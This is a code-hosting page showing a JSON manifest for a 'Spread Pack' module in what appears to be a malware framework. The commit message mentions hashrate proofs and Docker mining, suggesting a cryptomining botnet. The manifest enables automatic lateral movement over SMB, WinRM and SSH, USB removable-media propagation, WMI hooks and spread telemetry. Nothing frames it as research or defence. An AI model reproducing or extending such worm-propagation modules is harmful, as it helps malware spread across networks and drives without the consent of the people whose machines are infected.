Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Dashboard ambient layer, comrade presence, Mission Deck and War Room, Emberwake supply chain, spread/docs publishing, fleet policy and modules API, CI docker mining, and refreshed USB pack.
20 lines
718 B
JSON
20 lines
718 B
JSON
{
|
|
"name": "spread",
|
|
"version": "1",
|
|
"display_name": "Spread Pack",
|
|
"summary": "Lateral and passive spread — SMB auto-spread plus USB/WMI hooks",
|
|
"description": "Enables spread flags on a minimal forge. Agents gain auto_spread for scheduled lateral movement and usb_spread for removable-media propagation. Complements baked forge modes — does not replace Emberwake or Spread Kit presets.",
|
|
"accent": "cyan",
|
|
"capabilities": [
|
|
"SMB / WinRM auto-spread scheduler",
|
|
"SSH lateral spread (Linux/macOS)",
|
|
"USB removable-media propagation",
|
|
"WMI-based passive hooks (Windows)",
|
|
"Spread status & funnel telemetry"
|
|
],
|
|
"features": {
|
|
"auto_spread": true,
|
|
"usb_spread": true
|
|
}
|
|
}
|